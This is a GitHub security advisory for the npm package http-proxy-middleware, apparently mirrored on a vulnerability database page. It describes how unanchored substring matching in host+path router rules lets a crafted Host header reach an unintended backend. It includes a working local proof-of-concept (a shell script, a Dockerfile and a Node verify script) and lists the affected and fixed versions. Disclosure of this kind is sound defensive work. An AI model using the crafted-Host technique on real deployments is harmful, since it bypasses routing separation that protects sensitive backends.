GHSA-64MM-VXMG-Q3VJ

Vulnerability from github – Published: 2026-06-18 13:06 – Updated: 2026-06-22 15:59
VLAI
Summary
http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass
Details

Summary

http-proxy-middleware documents router proxy-table entries as host, path, or host+path selectors, but the host+path implementation uses unanchored substring matching on attacker-controlled request metadata. As a result, a crafted Host header that is only a superstring match for a configured host+path key can still route a request to an unintended backend.

Details

Tested code state:

  • validated on tag v4.0.0-beta.5
  • corresponding commit: 339f09ede860197807d4fd99ed9020fa5d0bd358

Relevant code locations:

  • src/router.ts
  • src/http-proxy-middleware.ts

Affected public API:

  • createProxyMiddleware({ router: { 'host/path': 'http://target' } })

Code explanation:

When a proxy-table router key contains /, getTargetFromProxyTable() concatenates attacker-controlled req.headers.host and req.url into a single hostAndPath string, then accepts the route if:

hostAndPath.indexOf(key) > -1

That is a substring test, not an exact host match plus intended path match. In the validated PoC, the configured router key is:

localhost:3000/api

but the attacker-controlled host is:

evillocalhost:3000

and the request path is:

/api

The concatenated attacker-controlled string:

evillocalhost:3000/api

still contains the configured router key as a substring, so the middleware selects the alternate backend even though the host is not equal to the configured host.

Exploit path:

  1. the application enables the documented proxy-table router feature with at least one host+path rule
  2. an external attacker sends an ordinary HTTP request with a crafted Host header
  3. HttpProxyMiddleware.prepareProxyRequest() applies router selection before proxying
  4. getTargetFromProxyTable() accepts the crafted Host + path string through substring matching
  5. the request is proxied to the wrong backend

PoC

Create these files in the same working directory and run:

bash ./run.sh

File: run.sh

#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"

cleanup() {
  rm -rf "${WORKDIR}"
}
trap cleanup EXIT

echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"

mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"

echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"

echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs

File: Dockerfile

FROM node:22-bullseye

WORKDIR /work

COPY repo/package.json repo/yarn.lock /work/repo/

RUN corepack enable \
  && cd /work/repo \
  && yarn install --frozen-lockfile

COPY repo /work/repo
RUN cd /work/repo && yarn build

COPY reproduction /work/reproduction

File: verify.mjs

import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';

import { createProxyMiddleware } from '/work/repo/dist/index.js';

const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';

function listen(server, port) {
  return new Promise((resolve) => {
    server.listen(port, '127.0.0.1', () => resolve());
  });
}

function close(server) {
  return new Promise((resolve, reject) => {
    server.close((err) => {
      if (err) {
        reject(err);
        return;
      }
      resolve();
    });
  });
}

function request(path, host) {
  return new Promise((resolve, reject) => {
    const req = http.request(
      {
        host: '127.0.0.1',
        port: 3000,
        path,
        method: 'GET',
        headers: {
          Host: host,
        },
      },
      (res) => {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) => {
          data += chunk;
        });
        res.on('end', () => {
          resolve({ statusCode: res.statusCode, body: data });
        });
      },
    );
    req.on('error', reject);
    req.end();
  });
}

const defaultBackend = http.createServer((req, res) => {
  res.end('DEFAULT');
});

const secretBackend = http.createServer((req, res) => {
  res.end('SECRET');
});

const proxyMiddleware = createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

const proxyServer = http.createServer((req, res) => {
  proxyMiddleware(req, res, () => {
    res.statusCode = 404;
    res.end('NO_PROXY');
  });
});

try {
  assert.ok(fs.existsSync('/work/repo/dist/index.js'));
  assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));

  await listen(defaultBackend, 3101);
  await listen(secretBackend, 3102);
  await listen(proxyServer, 3000);
  console.log('STEP start-services ok');

  const baseline = await request('/api', 'safe.example:3000');
  assert.equal(baseline.statusCode, 200);
  assert.equal(baseline.body, 'DEFAULT');
  console.log(`STEP baseline-route body=${baseline.body}`);

  const crafted = await request('/api', CRAFTED_HOST);
  assert.equal(crafted.statusCode, 200);
  assert.equal(crafted.body, 'SECRET');
  assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
  console.log(`STEP crafted-route body=${crafted.body}`);

  console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
  await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}

This PoC starts:

  • one default backend returning DEFAULT
  • one alternate backend returning SECRET
  • one proxy using:
createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

It then sends:

  1. a baseline request to /api with Host: safe.example:3000
  2. a crafted request to /api with Host: evillocalhost:3000

Observed result from the validated PoC:

  • baseline request: STEP baseline-route body=DEFAULT
  • crafted request: STEP crafted-route body=SECRET
  • success marker: RESULT reproduced host_header_injection router substring match bypass

The PoC is considered successful only if:

  1. the baseline request stays on the default backend
  2. the crafted request reaches the alternate backend
  3. the crafted host is not equal to the configured router host

Impact

This is a backend-selection integrity issue in a documented library feature. Applications that use host+path router-table rules for backend segmentation, tenant routing, or separation of public and more sensitive upstreams can have that routing boundary bypassed by an unauthenticated external client using an ordinary crafted Host header.

Severity
6.9 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "http-proxy-middleware"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "http-proxy-middleware"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "http-proxy-middleware"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.16.0"
            },
            {
              "fixed": "2.0.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55602"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-187"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T13:06:11Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "# Summary\n\n`http-proxy-middleware` documents `router` proxy-table entries as host, path, or host+path selectors, but the host+path implementation uses unanchored substring matching on attacker-controlled request metadata. As a result, a crafted `Host` header that is only a superstring match for a configured host+path key can still route a request to an unintended backend.\n\n# Details\n\nTested code state:\n\n- validated on tag `v4.0.0-beta.5`\n- corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358`\n\nRelevant code locations:\n\n- `src/router.ts`\n- `src/http-proxy-middleware.ts`\n\nAffected public API:\n\n- `createProxyMiddleware({ router: { \u0027host/path\u0027: \u0027http://target\u0027 } })`\n\nCode explanation:\n\nWhen a proxy-table router key contains `/`, `getTargetFromProxyTable()` concatenates attacker-controlled `req.headers.host` and `req.url` into a single `hostAndPath` string, then accepts the route if:\n\n```ts\nhostAndPath.indexOf(key) \u003e -1\n```\n\nThat is a substring test, not an exact host match plus intended path match. In the validated PoC, the configured router key is:\n\n```txt\nlocalhost:3000/api\n```\n\nbut the attacker-controlled host is:\n\n```txt\nevillocalhost:3000\n```\n\nand the request path is:\n\n```txt\n/api\n```\n\nThe concatenated attacker-controlled string:\n\n```txt\nevillocalhost:3000/api\n```\n\nstill contains the configured router key as a substring, so the middleware selects the alternate backend even though the host is not equal to the configured host.\n\nExploit path:\n\n1. the application enables the documented proxy-table `router` feature with at least one host+path rule\n2. an external attacker sends an ordinary HTTP request with a crafted `Host` header\n3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection before proxying\n4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string through substring matching\n5. the request is proxied to the wrong backend\n\n## PoC\n\nCreate these files in the same working directory and run:\n\n```bash\nbash ./run.sh\n```\n\n### File: `run.sh`\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nSCRIPT_DIR=\"$(cd \"$(dirname \"${BASH_SOURCE[0]}\")\" \u0026\u0026 pwd)\"\nREPO_URL=\"https://github.com/chimurai/http-proxy-middleware.git\"\nREPO_REF=\"v4.0.0-beta.5\"\nWORKDIR=\"$(mktemp -d \"${SCRIPT_DIR}/.tmp-repro.XXXXXX\")\"\nTARGET_REPO_DIR=\"${WORKDIR}/repo\"\nREPRO_DIR=\"${WORKDIR}/reproduction\"\nIMAGE_TAG=\"http-proxy-middleware-router-bypass-poc\"\n\ncleanup() {\n  rm -rf \"${WORKDIR}\"\n}\ntrap cleanup EXIT\n\necho \"[a3] cloning target repository\"\ngit clone --quiet \"${REPO_URL}\" \"${TARGET_REPO_DIR}\"\ngit -C \"${TARGET_REPO_DIR}\" checkout --quiet \"${REPO_REF}\"\n\nmkdir -p \"${REPRO_DIR}\"\ncp \"${SCRIPT_DIR}/Dockerfile\" \"${WORKDIR}/Dockerfile\"\ncp \"${SCRIPT_DIR}/verify.mjs\" \"${REPRO_DIR}/verify.mjs\"\n\necho \"[a3] building reproduction image\"\ndocker build -f \"${WORKDIR}/Dockerfile\" -t \"${IMAGE_TAG}\" \"${WORKDIR}\"\n\necho \"[a3] running verification\"\ndocker run --rm \"${IMAGE_TAG}\" node /work/reproduction/verify.mjs\n```\n\n### File: `Dockerfile`\n\n```Dockerfile\nFROM node:22-bullseye\n\nWORKDIR /work\n\nCOPY repo/package.json repo/yarn.lock /work/repo/\n\nRUN corepack enable \\\n  \u0026\u0026 cd /work/repo \\\n  \u0026\u0026 yarn install --frozen-lockfile\n\nCOPY repo /work/repo\nRUN cd /work/repo \u0026\u0026 yarn build\n\nCOPY reproduction /work/reproduction\n```\n\n### File: `verify.mjs`\n\n```js\nimport http from \u0027node:http\u0027;\nimport fs from \u0027node:fs\u0027;\nimport assert from \u0027node:assert/strict\u0027;\n\nimport { createProxyMiddleware } from \u0027/work/repo/dist/index.js\u0027;\n\nconst ROUTER_KEY = \u0027localhost:3000/api\u0027;\nconst CRAFTED_HOST = \u0027evillocalhost:3000\u0027;\n\nfunction listen(server, port) {\n  return new Promise((resolve) =\u003e {\n    server.listen(port, \u0027127.0.0.1\u0027, () =\u003e resolve());\n  });\n}\n\nfunction close(server) {\n  return new Promise((resolve, reject) =\u003e {\n    server.close((err) =\u003e {\n      if (err) {\n        reject(err);\n        return;\n      }\n      resolve();\n    });\n  });\n}\n\nfunction request(path, host) {\n  return new Promise((resolve, reject) =\u003e {\n    const req = http.request(\n      {\n        host: \u0027127.0.0.1\u0027,\n        port: 3000,\n        path,\n        method: \u0027GET\u0027,\n        headers: {\n          Host: host,\n        },\n      },\n      (res) =\u003e {\n        let data = \u0027\u0027;\n        res.setEncoding(\u0027utf8\u0027);\n        res.on(\u0027data\u0027, (chunk) =\u003e {\n          data += chunk;\n        });\n        res.on(\u0027end\u0027, () =\u003e {\n          resolve({ statusCode: res.statusCode, body: data });\n        });\n      },\n    );\n    req.on(\u0027error\u0027, reject);\n    req.end();\n  });\n}\n\nconst defaultBackend = http.createServer((req, res) =\u003e {\n  res.end(\u0027DEFAULT\u0027);\n});\n\nconst secretBackend = http.createServer((req, res) =\u003e {\n  res.end(\u0027SECRET\u0027);\n});\n\nconst proxyMiddleware = createProxyMiddleware({\n  target: \u0027http://127.0.0.1:3101\u0027,\n  router: {\n    [ROUTER_KEY]: \u0027http://127.0.0.1:3102\u0027,\n  },\n});\n\nconst proxyServer = http.createServer((req, res) =\u003e {\n  proxyMiddleware(req, res, () =\u003e {\n    res.statusCode = 404;\n    res.end(\u0027NO_PROXY\u0027);\n  });\n});\n\ntry {\n  assert.ok(fs.existsSync(\u0027/work/repo/dist/index.js\u0027));\n  assert.ok(fs.existsSync(\u0027/work/reproduction/verify.mjs\u0027));\n\n  await listen(defaultBackend, 3101);\n  await listen(secretBackend, 3102);\n  await listen(proxyServer, 3000);\n  console.log(\u0027STEP start-services ok\u0027);\n\n  const baseline = await request(\u0027/api\u0027, \u0027safe.example:3000\u0027);\n  assert.equal(baseline.statusCode, 200);\n  assert.equal(baseline.body, \u0027DEFAULT\u0027);\n  console.log(`STEP baseline-route body=${baseline.body}`);\n\n  const crafted = await request(\u0027/api\u0027, CRAFTED_HOST);\n  assert.equal(crafted.statusCode, 200);\n  assert.equal(crafted.body, \u0027SECRET\u0027);\n  assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split(\u0027/\u0027)[0]);\n  console.log(`STEP crafted-route body=${crafted.body}`);\n\n  console.log(\u0027RESULT reproduced host_header_injection router substring match bypass\u0027);\n} finally {\n  await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);\n}\n```\n\nThis PoC starts:\n\n- one default backend returning `DEFAULT`\n- one alternate backend returning `SECRET`\n- one proxy using:\n\n```js\ncreateProxyMiddleware({\n  target: \u0027http://127.0.0.1:3101\u0027,\n  router: {\n    [ROUTER_KEY]: \u0027http://127.0.0.1:3102\u0027,\n  },\n});\n```\n\nIt then sends:\n\n1. a baseline request to `/api` with `Host: safe.example:3000`\n2. a crafted request to `/api` with `Host: evillocalhost:3000`\n\nObserved result from the validated PoC:\n\n- baseline request: `STEP baseline-route body=DEFAULT`\n- crafted request: `STEP crafted-route body=SECRET`\n- success marker: `RESULT reproduced host_header_injection router substring match bypass`\n\nThe PoC is considered successful only if:\n\n1. the baseline request stays on the default backend\n2. the crafted request reaches the alternate backend\n3. the crafted host is not equal to the configured router host\n\n# Impact\n\nThis is a backend-selection integrity issue in a documented library feature. Applications that use host+path router-table rules for backend segmentation, tenant routing, or separation of public and more sensitive upstreams can have that routing boundary bypassed by an unauthenticated external client using an ordinary crafted `Host` header.",
  "id": "GHSA-64mm-vxmg-q3vj",
  "modified": "2026-06-22T15:59:21Z",
  "published": "2026-06-18T13:06:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/chimurai/http-proxy-middleware"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.